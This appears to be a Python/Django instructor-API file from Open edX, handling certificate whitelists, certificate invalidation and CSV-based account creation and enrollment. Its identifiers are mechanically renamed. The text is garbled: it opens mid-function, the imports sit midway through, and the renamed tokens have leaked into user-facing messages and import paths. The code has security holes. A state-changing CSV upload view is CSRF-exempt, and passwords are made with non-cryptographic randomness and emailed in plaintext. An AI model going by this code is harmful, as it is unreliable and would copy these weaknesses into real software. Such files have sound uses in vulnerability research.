        )
    VAR_153, VAR_72 = CertificateWhitelist.objects.get_or_create(
        VAR_19=VAR_40,
        VAR_10=VAR_38,
        defaults={
            'whitelist': True,
            'notes': VAR_41.get('notes', '')
        }
    )
    # Any already-generated, downloadable certificate (or None) — used only
    # to report its creation date back to the caller.
    VAR_44 = GeneratedCertificate.eligible_certificates.filter(
        VAR_19=VAR_40,
        VAR_10=VAR_38,
        status=CertificateStatuses.downloadable,
    ).first()
    VAR_154 = dict({
        'id': VAR_153.id,
        'user_email': VAR_40.email,
        'user_name': VAR_40.username,
        'user_id': VAR_40.id,
        'certificate_generated': VAR_44 and VAR_44.created_date.strftime("%B %d, %Y"),
        'created': VAR_153.created.strftime("%A, %B %d, %Y"),
    })
    return VAR_154
def FUNC_73(VAR_38, VAR_40):
    """Remove ``VAR_40`` from the certificate white list of ``VAR_38``.

    Also invalidates any certificate the student has already generated.
    Raises ``ValueError`` when no white-list entry exists.
    """
    try:
        VAR_41 = CertificateWhitelist.objects.get(VAR_19=VAR_40, VAR_10=VAR_38)
    except ObjectDoesNotExist:
        raise ValueError(
            _('Certificate VAR_154 (VAR_19={VAR_19}) does not exist in VAR_163 white list. '
              'Please refresh the page and try again.').format(VAR_19=VAR_40.username)
        )
    try:
        VAR_44 = GeneratedCertificate.objects.get(  # pylint: disable=no-member
            VAR_19=VAR_40,
            VAR_10=VAR_38
        )
        VAR_44.invalidate()
        VAR_0.info(
            u'Certificate invalidated for %s in VAR_65 %s when removed from VAR_163 VAR_154 list',
            VAR_40.username,
            VAR_38
        )
    except ObjectDoesNotExist:
        # No certificate generated yet — nothing to invalidate.
        pass
    VAR_41.delete()
def FUNC_74(VAR_9, VAR_38):
    """Parse the JSON request body and resolve the referenced student.

    Returns ``(payload, student)``.  Raises ``ValueError`` when the payload
    is malformed, names nobody, or the student is not enrolled.
    """
    VAR_41 = FUNC_75(VAR_9)
    identifier = VAR_41.get('user_name', '') or VAR_41.get('user_email', '')
    if not identifier:
        raise ValueError(_('Student VAR_15/VAR_14 field is required and can not be empty. '
                           'Kindly fill in VAR_15/VAR_14 and then press "Add to Exception List" button.'))
    return VAR_41, FUNC_76(identifier, VAR_38)
def FUNC_75(VAR_9):
    """Deserialize the request body as JSON; an empty body yields ``{}``."""
    try:
        return json.loads(VAR_9.body or '{}')
    except ValueError:
        raise ValueError(_('The record is not in the correct format. Please add a valid VAR_15 or VAR_14 address.'))
def FUNC_76(VAR_42, VAR_38):
    """Resolve a username/email to a User enrolled in course ``VAR_38``.

    Raises ``ValueError`` when the account does not exist or the user is
    not enrolled.
    """
    try:
        VAR_40 = get_user_by_username_or_email(VAR_42)
    except ObjectDoesNotExist:
        raise ValueError(_("{VAR_19} does not exist in the LMS. Please check your spelling and retry.").format(
            VAR_19=VAR_42
        ))
    if not CourseEnrollment.is_enrolled(VAR_40, VAR_38):
        raise ValueError(_("{VAR_19} is not enrolled in this VAR_65. Please check your spelling and retry.")
                         .format(VAR_19=VAR_42))
    return VAR_40
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_POST
def FUNC_77(VAR_9, VAR_10, VAR_43=None):
    """Generate certificates for white-listed students ('all' or only 'new')."""
    course_key = CourseKey.from_string(VAR_10)
    # Map the URL selector onto the task API's student-set identifiers.
    student_sets = {'all': 'all_whitelisted', 'new': 'whitelisted_not_generated'}
    if VAR_43 not in student_sets:
        return JsonResponse(
            {
                'success': False,
                'message': _('Invalid VAR_192, VAR_43 must be "new" or "all".'),
            },
            status=400
        )
    instructor_task.api.generate_certificates_for_students(
        VAR_9, course_key, student_set=student_sets[VAR_43]
    )
    return JsonResponse({
        'success': True,
        'message': _('Certificate generation started for white listed VAR_125.'),
    })
@csrf_exempt
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_POST
def FUNC_78(VAR_9, VAR_10):  # pylint: disable=invalid-VAR_16
    """Bulk-add certificate exceptions from an uploaded two-column CSV.

    Each row is ``(user identifier, notes)``.  The JSON response lists
    general errors, per-category row errors, and successfully added rows.
    """
    # Column indices into each CSV row.
    VAR_156 = 0  # user identifier (username or email)
    VAR_157 = 1  # free-form notes
    VAR_158 = ['data_format_error', 'user_not_exist', 'user_already_white_listed', 'user_not_enrolled']
    VAR_38 = CourseKey.from_string(VAR_10)
    VAR_125, VAR_50, VAR_159 = [], [], []
    VAR_49 = {VAR_160: [] for VAR_160 in VAR_158}

    def FUNC_87(VAR_160, VAR_161, VAR_162):
        # Record one categorized per-row error message.
        VAR_49[VAR_160].append(_('user "{VAR_19}" in row# {row}').format(VAR_19=VAR_161, row=VAR_162))

    if 'students_list' in VAR_9.FILES:
        try:
            VAR_194 = VAR_9.FILES.get('students_list')
            if VAR_194.name.endswith('.csv'):
                VAR_125 = [row for row in VAR_26.reader(VAR_194.read().splitlines())]
            else:
                VAR_50.append(_('Make sure that the file you upload is in CSV format with no '
                                'extraneous characters or VAR_124.'))
        except Exception:  # pylint: disable=broad-except
            VAR_50.append(_('Could not read uploaded file.'))
        finally:
            VAR_194.close()
        VAR_166 = 0  # 1-based row counter used in error messages
        for VAR_40 in VAR_125:
            VAR_166 += 1
            if len(VAR_40) != 2:
                # Blank rows are skipped silently; malformed rows reported.
                if len(VAR_40) > 0:
                    FUNC_87('data_format_error', VAR_40[VAR_156], VAR_166)
                    VAR_0.info(u'invalid VAR_192/format in VAR_26 row# %s', VAR_166)
                continue
            VAR_19 = VAR_40[VAR_156]
            try:
                # Rebind the identifier string to the resolved User object.
                VAR_19 = get_user_by_username_or_email(VAR_19)
            except ObjectDoesNotExist:
                FUNC_87('user_not_exist', VAR_19, VAR_166)
                VAR_0.info(u'student %s does not exist', VAR_19)
            else:
                if len(CertificateWhitelist.get_certificate_white_list(VAR_38, VAR_19)) > 0:
                    FUNC_87('user_already_white_listed', VAR_19, VAR_166)
                    VAR_0.warning(u'student %s already exist.', VAR_19.username)
                elif not CourseEnrollment.is_enrolled(VAR_19, VAR_38):
                    FUNC_87('user_not_enrolled', VAR_19, VAR_166)
                    VAR_0.warning(u'student %s is not enrolled in VAR_65.', VAR_19.username)
                else:
                    CertificateWhitelist.objects.create(
                        VAR_19=VAR_19,
                        VAR_10=VAR_38,
                        whitelist=True,
                        notes=VAR_40[VAR_157]
                    )
                    VAR_159.append(_('user "{VAR_15}" in row# {row}').format(VAR_15=VAR_19.username, row=VAR_166))
    else:
        VAR_50.append(_('File is not attached.'))
    VAR_51 = {
        'general_errors': VAR_50,
        'row_errors': VAR_49,
        'success': VAR_159
    }
    return JsonResponse(VAR_51)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_http_methods(['POST', 'DELETE'])
def FUNC_79(VAR_9, VAR_10):
    """Invalidate (POST) or re-validate (DELETE) a student's certificate.

    The JSON body identifies the student; validation failures return a 400
    JSON response with a ``message``.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    try:
        VAR_45 = FUNC_75(VAR_9)  # parsed JSON payload
        VAR_163 = FUNC_82(VAR_45, VAR_38)  # the student's generated certificate
    except ValueError as VAR_169:
        return JsonResponse({'message': VAR_169.message}, status=400)
    if VAR_9.method == 'POST':
        try:
            VAR_46 = FUNC_80(VAR_9, VAR_163, VAR_45)
        except ValueError as VAR_169:
            return JsonResponse({'message': VAR_169.message}, status=400)
        return JsonResponse(VAR_46)
    elif VAR_9.method == 'DELETE':
        try:
            FUNC_81(VAR_9, VAR_38, VAR_163)
        except ValueError as VAR_169:
            return JsonResponse({'message': VAR_169.message}, status=400)
        # 204: invalidation removed, nothing to return.
        return JsonResponse({}, status=204)
def FUNC_80(VAR_9, VAR_44, VAR_45):
    """Invalidate certificate ``VAR_44`` and record who invalidated it.

    Raises ``ValueError`` when the certificate is already invalidated or not
    in a valid state; returns a dict describing the invalidation record.
    """
    if len(CertificateInvalidation.get_certificate_invalidations(
            VAR_44.course_id,
            VAR_44.user,
    )) > 0:
        raise ValueError(
            _("Certificate of {VAR_19} has already been invalidated. Please check your spelling and retry.").format(
                VAR_19=VAR_44.user.username,
            )
        )
    if not VAR_44.is_valid():
        raise ValueError(
            _("Certificate for VAR_40 {VAR_19} is already invalid, kindly verify that VAR_163 was generated "
              "for this VAR_40 and then proceed.").format(VAR_19=VAR_44.user.username)
        )
    # Bug fix: the lookup value previously referenced the undefined name
    # ``generated_certificate`` (NameError); the parameter is intended.
    VAR_46, VAR_72 = CertificateInvalidation.objects.update_or_create(
        VAR_44=VAR_44,
        defaults={
            'invalidated_by': VAR_9.user,
            'notes': VAR_45.get("notes", ""),
            'active': True,
        }
    )
    VAR_44.invalidate()
    return {
        'id': VAR_46.id,
        'user': VAR_46.generated_certificate.user.username,
        'invalidated_by': VAR_46.invalidated_by.username,
        'created': VAR_46.created.strftime("%B %d, %Y"),
        'notes': VAR_46.notes,
    }
def FUNC_81(VAR_9, VAR_38, VAR_44):
    """Deactivate a certificate invalidation and queue regeneration of the
    affected student's certificate.

    Raises ``ValueError`` when no invalidation record exists.
    """
    try:
        # Bug fix: previously looked up with the undefined name
        # ``generated_certificate`` (NameError); use the parameter.
        VAR_46 = CertificateInvalidation.objects.get(VAR_44=VAR_44)
    except ObjectDoesNotExist:
        raise ValueError(_("Certificate Invalidation does not exist, Please refresh the page and try again."))
    else:
        VAR_46.deactivate()
        VAR_40 = VAR_46.generated_certificate.user
        # Regenerate only this student's certificate in the background.
        instructor_task.api.generate_certificates_for_students(
            VAR_9, VAR_38, student_set="specific_student", specific_student_id=VAR_40.id
        )
def FUNC_82(VAR_46, VAR_38):
    """Validate an invalidation payload and return the student's certificate.

    Raises ``ValueError`` when no student is named or the student has no
    certificate for this course.
    """
    VAR_19 = VAR_46.get("user")
    if not VAR_19:
        raise ValueError(
            _('Student VAR_15/VAR_14 field is required and can not be empty. '
              'Kindly fill in VAR_15/VAR_14 and then press "Invalidate Certificate" button.')
        )
    VAR_40 = FUNC_76(VAR_19, VAR_38)
    VAR_163 = GeneratedCertificate.certificate_for_student(VAR_40, VAR_38)
    if not VAR_163:
        # Bug fix: the keyword names passed to ``format`` must match the
        # ``{student}``/``{course}`` placeholders; previously they were
        # passed under other names, raising KeyError at runtime.
        raise ValueError(_(
            "The VAR_40 {student} does not have VAR_163 for the VAR_65 {course}. Kindly verify VAR_40 "
            "username/VAR_14 and the selected VAR_65 are correct and try again."
        ).format(student=VAR_40.username, course=VAR_38.course))
    return VAR_163
# (removed stray '|' artifact left over from file concatenation)
import StringIO
import json
import logging  # fixed: `import .logging` is invalid relative-import syntax
import re
import time
from django.conf import settings
from django.views.decorators.csrf import ensure_csrf_cookie, csrf_exempt
from django.views.decorators.http import require_POST, require_http_methods
from django.views.decorators.cache import cache_control
from django.core.exceptions import ValidationError, PermissionDenied
from django.core.mail.message import EmailMessage
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError, transaction
from django.core.urlresolvers import reverse
from django.core.validators import validate_email
from django.utils.translation import ugettext as _
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotFound
from django.utils.html import strip_tags
from django.shortcuts import redirect
import string
import random
import unicodecsv
import decimal
from VAR_40 import auth
from VAR_40.roles import GlobalStaff, CourseSalesAdminRole, CourseFinanceAdminRole
from util.file import (
    store_uploaded_file, course_and_time_based_filename_generator,
    FileValidationException, UniversalNewlineIterator
)
from util.json_request import JsonResponse, JsonResponseBadRequest
from instructor.views.instructor_task_helpers import extract_email_features, extract_task_features
from microsite_configuration import microsite
from courseware.access import has_access
from courseware.courses import get_course_with_access, get_course_by_id
from django.contrib.auth.models import User
from django_comment_client.utils import has_forum_access
from django_comment_common.models import (
    Role,
    FORUM_ROLE_ADMINISTRATOR,
    FORUM_ROLE_MODERATOR,
    FORUM_ROLE_COMMUNITY_TA,
)
from edxmako.shortcuts import render_to_string
from courseware.models import StudentModule
from shoppingcart.models import (
    Coupon,
    CourseRegistrationCode,
    RegistrationCodeRedemption,
    Invoice,
    CourseMode,
    CourseRegistrationCodeInvoiceItem,
)
from VAR_40.models import (
    CourseEnrollment, unique_id_for_user, anonymous_id_for_user,
    UserProfile, Registration, EntranceExamConfiguration,
    ManualEnrollmentAudit, UNENROLLED_TO_ALLOWEDTOENROLL, ALLOWEDTOENROLL_TO_ENROLLED,
    ENROLLED_TO_ENROLLED, ENROLLED_TO_UNENROLLED, UNENROLLED_TO_ENROLLED,
    UNENROLLED_TO_UNENROLLED, ALLOWEDTOENROLL_TO_UNENROLLED, DEFAULT_TRANSITION_STATE
)
import instructor_task.api
from instructor_task.api_helper import AlreadyRunningError
from instructor_task.models import ReportStore
import instructor.enrollment as enrollment
from instructor.enrollment import (
    get_user_email_language,
    enroll_email,
    send_mail_to_student,
    get_email_params,
    send_beta_role_email,
    unenroll_email,
)
from instructor.access import list_with_level, allow_access, revoke_access, ROLES, update_forum_role
import instructor_analytics.basic
import instructor_analytics.distributions
import instructor_analytics.csvs
import csv as VAR_26  # fixed: `import .csv` is invalid; module is referenced as VAR_26 below
from openedx.core.djangoapps.user_api.preferences.api import get_user_preference, set_user_preference
from openedx.core.djangolib.markup import HTML, Text
from instructor.views import INVOICE_KEY
from submissions import api as sub_api  # installed from the edx-submissions repository
from certificates import api as certs_api
from certificates.models import CertificateWhitelist, GeneratedCertificate, CertificateStatuses, CertificateInvalidation
from bulk_email.models import CourseEmail, BulkEmailFlag
from VAR_40.models import get_user_by_username_or_email
from .tools import (
    dump_student_extensions,
    dump_module_extensions,
    find_unit,
    get_student_from_identifier,
    require_student_from_identifier,
    handle_dashboard_error,
    parse_datetime,
    set_due_date_extension,
    strip_if_string,
)
from opaque_keys.edx.keys import CourseKey, UsageKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys import InvalidKeyError
from openedx.core.djangoapps.course_groups.cohorts import is_course_cohorted
from openedx.core.djangoapps.theming import helpers as theming_helpers
from openedx.core.djangoapps.theming import helpers as theming_helpers
# Module-level logger for this instructor views module.
VAR_0 = logging.getLogger(__name__)
def FUNC_0(VAR_1):
    """Decorator translating common user/task errors into 400 responses.

    JSON clients (ajax, or ``Accept: application/json``) receive a JSON
    error body; anything else gets a plain ``HttpResponseBadRequest``.
    """
    def FUNC_82(VAR_9, *VAR_2, **VAR_3):  # pylint: disable=missing-docstring
        wants_json = (VAR_9.is_ajax() or
                      VAR_9.META.get("HTTP_ACCEPT", "").startswith("application/json"))

        def _bad_request(message):
            # Render the error in whichever format the client asked for.
            if wants_json:
                return JsonResponse({"error": message}, 400)
            return HttpResponseBadRequest(message)

        try:
            return VAR_1(VAR_9, *VAR_2, **VAR_3)
        except User.DoesNotExist:
            return _bad_request(_("User does not exist."))
        except AlreadyRunningError:
            return _bad_request(_("Task is already running."))
    return FUNC_82
def FUNC_1(*VAR_2, **VAR_3):
    """Decorator factory: reject requests missing required POST parameters.

    Positional arguments are required parameter names; keyword arguments
    map a parameter name to extra help text returned to the client.
    """
    VAR_47 = []
    VAR_47 += [(arg, None) for arg in VAR_2]
    VAR_47 += [(VAR_160, VAR_3[VAR_160]) for VAR_160 in VAR_3]

    def FUNC_83(VAR_1):  # pylint: disable=missing-docstring
        def FUNC_82(*VAR_2, **VAR_3):  # pylint: disable=missing-docstring
            VAR_9 = VAR_2[0]
            VAR_193 = {
                'error': 'Missing required query parameter(s)',
                'parameters': [],
                'info': {},
            }
            for (VAR_209, extra) in VAR_47:
                # Fresh sentinel distinguishes "absent" from any real value.
                VAR_199 = object()
                # Bug fix: the comparison previously referenced the
                # undefined name ``default`` (NameError); the sentinel
                # itself is the intended comparison target.
                if VAR_9.POST.get(VAR_209, VAR_199) == VAR_199:
                    VAR_193['parameters'].append(VAR_209)
                    VAR_193['info'][VAR_209] = extra
            if len(VAR_193['parameters']) > 0:
                return JsonResponse(VAR_193, status=400)
            else:
                return VAR_1(*VAR_2, **VAR_3)
        return FUNC_82
    return FUNC_83
def FUNC_2(VAR_4):
    """Decorator factory gating a view on course-level access.

    Only the 'instructor' and 'staff' levels are supported; anything else
    is rejected at decoration time.
    """
    if VAR_4 not in ['instructor', 'staff']:
        raise ValueError("unrecognized VAR_4 '{}'".format(VAR_4))

    def FUNC_83(VAR_1):  # pylint: disable=missing-docstring
        def FUNC_82(*VAR_2, **VAR_3):  # pylint: disable=missing-docstring
            VAR_9 = VAR_2[0]
            VAR_65 = get_course_by_id(CourseKey.from_string(VAR_3['course_id']))
            if not has_access(VAR_9.user, VAR_4, VAR_65):
                return HttpResponseForbidden()
            return VAR_1(*VAR_2, **VAR_3)
        return FUNC_82
    return FUNC_83
def FUNC_3(VAR_1):
    """Decorator restricting a view to global platform staff."""
    def FUNC_82(VAR_9, *VAR_2, **VAR_3):  # pylint: disable=missing-docstring
        if not GlobalStaff().has_user(VAR_9.user):
            return HttpResponseForbidden(
                u"Must be {platform_name} staff to perform this VAR_57.".format(
                    platform_name=settings.PLATFORM_NAME
                )
            )
        return VAR_1(VAR_9, *VAR_2, **VAR_3)
    return FUNC_82
def FUNC_4(VAR_1):
    """Decorator restricting a view to course sales admins."""
    def FUNC_82(VAR_9, VAR_10):  # pylint: disable=missing-docstring
        try:
            VAR_38 = CourseKey.from_string(VAR_10)
        except InvalidKeyError:
            VAR_0.error(u"Unable to find VAR_65 with VAR_65 VAR_160 %s", VAR_10)
            return HttpResponseNotFound()
        if not auth.user_has_role(VAR_9.user, CourseSalesAdminRole(VAR_38)):
            return HttpResponseForbidden()
        return VAR_1(VAR_9, VAR_10)
    return FUNC_82
def FUNC_5(VAR_1):
    """Decorator restricting a view to course finance admins.

    Mirrors FUNC_4 but checks the finance-admin role.
    """
    def FUNC_82(VAR_9, VAR_10):  # pylint: disable=missing-docstring
        try:
            VAR_38 = CourseKey.from_string(VAR_10)
        except InvalidKeyError:
            VAR_0.error(u"Unable to find VAR_65 with VAR_65 VAR_160 %s", VAR_10)
            return HttpResponseNotFound()
        if not auth.user_has_role(VAR_9.user, CourseFinanceAdminRole(VAR_38)):
            return HttpResponseForbidden()
        return VAR_1(VAR_9, VAR_10)
    return FUNC_82
# Column indices for rows of the auto-enrollment CSV upload (see FUNC_6):
# email, username, full name, country.
VAR_5 = 0
VAR_6 = 1
VAR_7 = 2
VAR_8 = 3
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_6(VAR_9, VAR_10):  # pylint: disable=too-many-statements
    """Create accounts and enroll students from an uploaded 4-column CSV.

    Rows are (email, username, full name, country).  Existing accounts are
    enrolled (with a warning if the username differs); unknown emails get a
    new account with a generated password.  Returns JSON with row errors,
    general errors and warnings.

    Bug fixes: several format/keyword values referenced undefined names
    (``row_num``, ``email``, ``username``, ``course_id``, ``email_params``)
    that would raise NameError; the corresponding local variables are used.
    """
    if not microsite.get_value('ALLOW_AUTOMATED_SIGNUPS', settings.FEATURES.get('ALLOW_AUTOMATED_SIGNUPS', False)):
        return HttpResponseForbidden()
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_48 = []  # warnings
    VAR_49 = []  # per-row errors
    VAR_50 = []  # general (whole-file) errors
    # White-label courses enroll in the default shopping-cart mode.
    if CourseMode.is_white_label(VAR_10):
        VAR_24 = CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG
    else:
        VAR_24 = None
    if 'students_list' in VAR_9.FILES:
        VAR_125 = []
        try:
            VAR_194 = VAR_9.FILES.get('students_list')
            if VAR_194.name.endswith('.csv'):
                VAR_125 = [row for row in VAR_26.reader(VAR_194.read().splitlines())]
                VAR_65 = get_course_by_id(VAR_10)
            else:
                VAR_50.append({
                    'username': '', 'email': '',
                    'response': _('Make sure that the file you upload is in CSV format with no extraneous characters or VAR_124.')
                })
        except Exception:  # pylint: disable=broad-except
            VAR_50.append({
                'username': '', 'email': '', 'response': _('Could not read uploaded file.')
            })
        finally:
            VAR_194.close()
        VAR_12 = []  # passwords generated so far (kept unique)
        VAR_166 = 0  # 1-based row counter for error messages
        for VAR_40 in VAR_125:
            VAR_166 += 1
            if len(VAR_40) != 4:
                if len(VAR_40) > 0:
                    VAR_50.append({
                        'username': '',
                        'email': '',
                        'response': _('Data in row #{VAR_166} must have exactly four columns: VAR_14, VAR_15, full VAR_16, and country').format(VAR_166=VAR_166)
                    })
                continue
            VAR_14 = VAR_40[VAR_5]
            VAR_15 = VAR_40[VAR_6]
            VAR_16 = VAR_40[VAR_7]
            VAR_17 = VAR_40[VAR_8][:2]  # ISO country code: first two chars only
            VAR_25 = get_email_params(VAR_65, True, VAR_168=VAR_9.is_secure())
            try:
                validate_email(VAR_14)  # Raises ValidationError if invalid
            except ValidationError:
                VAR_49.append({
                    'username': VAR_15, 'email': VAR_14, 'response': _('Invalid VAR_14 {email_address}.').format(email_address=VAR_14)})
            else:
                if User.objects.filter(VAR_14=VAR_14).exists():
                    VAR_19 = User.objects.get(VAR_14=VAR_14)
                    if not User.objects.filter(VAR_14=VAR_14, VAR_15=VAR_15).exists():
                        # Same email, different username: warn but enroll.
                        VAR_211 = _(
                            'An account with VAR_14 {email} exists but the provided VAR_15 {VAR_15} '
                            'is different. Enrolling anyway with {VAR_14}.'
                        ).format(VAR_14=VAR_14, VAR_15=VAR_15)
                        VAR_48.append({
                            'username': VAR_15, 'email': VAR_14, 'response': VAR_211
                        })
                        VAR_0.warning(u'email %s already exist', VAR_14)
                    else:
                        VAR_0.info(
                            u"user already exists with VAR_15 '%s' and VAR_14 '%s'",
                            VAR_15,
                            VAR_14
                        )
                    if not CourseEnrollment.is_enrolled(VAR_19, VAR_10):
                        FUNC_10(
                            VAR_19=VAR_19,
                            VAR_10=VAR_10,
                            VAR_20=VAR_24,
                            VAR_21=VAR_9.user,
                            VAR_22='Enrolling via VAR_26 upload',
                            VAR_23=UNENROLLED_TO_ENROLLED,
                        )
                        enroll_email(VAR_10=VAR_10, student_email=VAR_14, VAR_60=True, VAR_61=True, VAR_25=VAR_25)
                else:
                    # Unknown email: create the account with a fresh password.
                    VAR_18 = FUNC_8(VAR_12)
                    VAR_56 = FUNC_11(
                        VAR_14, VAR_15, VAR_16, VAR_17, VAR_18, VAR_10, VAR_24, VAR_9.user, VAR_25
                    )
                    VAR_49.extend(VAR_56)
    else:
        VAR_50.append({
            'username': '', 'email': '', 'response': _('File is not attached.')
        })
    VAR_51 = {
        'row_errors': VAR_49,
        'general_errors': VAR_50,
        'warnings': VAR_48
    }
    return JsonResponse(VAR_51)
def FUNC_7(VAR_11):
    """Return a pseudo-random password of length ``VAR_11``.

    Ambiguous characters (vowels, ``1``, ``l``) are excluded so generated
    passwords are easier to transcribe.

    SECURITY NOTE: ``random`` is not a cryptographically secure source;
    ``random.choice`` should be replaced with ``secrets.choice`` for
    anything security-sensitive.
    """
    VAR_52 = [
        char for char in string.ascii_uppercase + string.digits + string.ascii_lowercase
        if char not in 'aAeEiIoOuU1l'
    ]
    # Bug fix/modernization: ``string.join`` no longer exists in Python 3;
    # ``str.join`` is the equivalent and works on both.
    return ''.join(random.choice(VAR_52) for VAR_72 in range(VAR_11))
def FUNC_8(VAR_12, VAR_13=12):
    """Generate a password of length ``VAR_13`` not already in ``VAR_12``,
    record it there, and return it."""
    while True:
        candidate = FUNC_7(VAR_13)
        if candidate not in VAR_12:
            break
    VAR_12.append(candidate)
    return candidate
def FUNC_9(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18):
    """Create, register, and profile a new user; return the User object.

    Arguments are (email, username, full name, country, password).
    """
    VAR_19 = User.objects.create_user(VAR_15, VAR_14, VAR_18)
    VAR_53 = Registration()
    VAR_53.register(VAR_19)
    # Bug fix: previously referenced the undefined name ``user`` (NameError).
    VAR_54 = UserProfile(VAR_19=VAR_19)
    VAR_54.name = VAR_16
    VAR_54.country = VAR_17
    VAR_54.save()
    return VAR_19
def FUNC_10(VAR_19, VAR_10, VAR_20, VAR_21, VAR_22, VAR_23):
    """Enroll ``VAR_19`` in ``VAR_10`` and record a manual-enrollment audit.

    Returns the created enrollment.
    """
    # Bug fix: the keyword value referenced the undefined name ``mode``
    # (NameError); the parameter itself is intended.
    VAR_55 = CourseEnrollment.enroll(VAR_19, VAR_10, VAR_20=VAR_20)
    ManualEnrollmentAudit.create_manual_enrollment_audit(
        VAR_21, VAR_19.email, VAR_23, VAR_22, VAR_55
    )
    VAR_0.info(u'user %s enrolled in the VAR_65 %s', VAR_19.username, VAR_10)
    return VAR_55
def FUNC_11(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18, VAR_10, VAR_24, VAR_21, VAR_25):
    """Create an account, enroll it, and email the new credentials.

    Returns a list of per-row error dicts (empty on full success).  Account
    creation and enrollment run in one atomic transaction so a failed
    enrollment also rolls back the new account.
    """
    VAR_56 = list()
    try:
        with transaction.atomic():
            VAR_19 = FUNC_9(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18)
            # Bug fix: keyword values referenced the undefined names
            # ``course_id``/``enrolled_by``; the parameters are intended.
            FUNC_10(
                VAR_19=VAR_19,
                VAR_10=VAR_10,
                VAR_20=VAR_24,
                VAR_21=VAR_21,
                VAR_22='Enrolling via VAR_26 upload',
                VAR_23=UNENROLLED_TO_ENROLLED,
            )
    except IntegrityError:
        VAR_56.append({
            'username': VAR_15, 'email': VAR_14, 'response': _('Username {VAR_19} already exists.').format(VAR_19=VAR_15)
        })
    except Exception as ex:  # pylint: disable=broad-except
        VAR_0.exception(type(ex).__name__)
        VAR_56.append({
            'username': VAR_15, 'email': VAR_14, 'response': type(ex).__name__,
        })
    else:
        try:
            VAR_25.update({
                'message': 'account_creation_and_enrollment',
                'email_address': VAR_14,
                'password': VAR_18,
                'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
            })
            send_mail_to_student(VAR_14, VAR_25)
        except Exception as ex:  # pylint: disable=broad-except
            VAR_0.exception(
                "Exception '{VAR_154}' raised while sending VAR_14 to new VAR_19.".format(VAR_154=type(ex).__name__)
            )
            VAR_56.append({
                'username': VAR_15,
                'email': VAR_14,
                'response':
                    # Bug fix: the format kwarg must match the ``{email}``
                    # placeholder (previously a KeyError/NameError).
                    _("Error '{VAR_169}' while sending VAR_14 to new VAR_19 (user VAR_14={email}). "
                      "Without the VAR_14 VAR_40 would not be able to login. "
                      "Please contact support for further information.").format(VAR_169=type(ex).__name__, email=VAR_14),
            })
        else:
            VAR_0.info(u'email sent to new VAR_149 VAR_19 at %s', VAR_14)
    return VAR_56
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1(VAR_57="enroll or unenroll", VAR_59="stringified list of VAR_133 and/or usernames")
def FUNC_12(VAR_9, VAR_10):
    """Enroll or unenroll a batch of students identified by email/username.

    Returns JSON with per-identifier before/after enrollment state.  White
    label courses additionally require a ``reason`` in the POST data.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_57 = VAR_9.POST.get('action')
    VAR_58 = VAR_9.POST.get('identifiers')
    VAR_59 = FUNC_63(VAR_58)
    VAR_60 = VAR_9.POST.get('auto_enroll') in ['true', 'True', True]
    VAR_61 = VAR_9.POST.get('email_students') in ['true', 'True', True]
    VAR_62 = CourseMode.is_white_label(VAR_10)
    VAR_22 = VAR_9.POST.get('reason')
    if VAR_62:
        if not VAR_22:
            return JsonResponse(
                {
                    'action': VAR_57,
                    'results': [{'error': True}],
                    'auto_enroll': VAR_60,
                }, status=400)
    VAR_55 = None
    VAR_23 = DEFAULT_TRANSITION_STATE
    VAR_25 = {}
    if VAR_61:
        VAR_65 = get_course_by_id(VAR_10)
        VAR_25 = get_email_params(VAR_65, VAR_60, VAR_168=VAR_9.is_secure())
    VAR_51 = []
    for identifier in VAR_59:
        VAR_19 = None
        VAR_14 = None
        VAR_167 = None
        try:
            VAR_19 = get_student_from_identifier(identifier)
        except User.DoesNotExist:
            # Unknown user: treat the identifier itself as an email address.
            VAR_14 = identifier
        else:
            VAR_14 = VAR_19.email
            VAR_167 = get_user_email_language(VAR_19)
        try:
            validate_email(VAR_14)  # Raises ValidationError if invalid
            if VAR_57 == 'enroll':
                # Bug fix: ``VAR_167=language`` referenced an undefined name
                # (NameError); pass the local variable.
                VAR_200, VAR_201, VAR_55 = enroll_email(
                    VAR_10, VAR_14, VAR_60, VAR_61, VAR_25, VAR_167=VAR_167
                )
                VAR_202 = VAR_200.to_dict()['enrollment']
                VAR_203 = VAR_200.to_dict()['user']
                VAR_204 = VAR_200.to_dict()['allowed']
                VAR_205 = VAR_201.to_dict()['enrollment']
                VAR_206 = VAR_201.to_dict()['allowed']
                # Derive the audit transition from before/after state.
                if VAR_203:
                    if VAR_205:
                        if VAR_202:
                            VAR_23 = ENROLLED_TO_ENROLLED
                        else:
                            if VAR_204:
                                VAR_23 = ALLOWEDTOENROLL_TO_ENROLLED
                            else:
                                VAR_23 = UNENROLLED_TO_ENROLLED
                    else:
                        if VAR_206:
                            VAR_23 = UNENROLLED_TO_ALLOWEDTOENROLL
            elif VAR_57 == 'unenroll':
                # Bug fix: same undefined ``language`` reference as above.
                VAR_200, VAR_201 = unenroll_email(
                    VAR_10, VAR_14, VAR_61, VAR_25, VAR_167=VAR_167
                )
                VAR_202 = VAR_200.to_dict()['enrollment']
                VAR_204 = VAR_200.to_dict()['allowed']
                VAR_55 = CourseEnrollment.get_enrollment(VAR_19, VAR_10)
                if VAR_202:
                    VAR_23 = ENROLLED_TO_UNENROLLED
                else:
                    if VAR_204:
                        VAR_23 = ALLOWEDTOENROLL_TO_UNENROLLED
                    else:
                        VAR_23 = UNENROLLED_TO_UNENROLLED
            else:
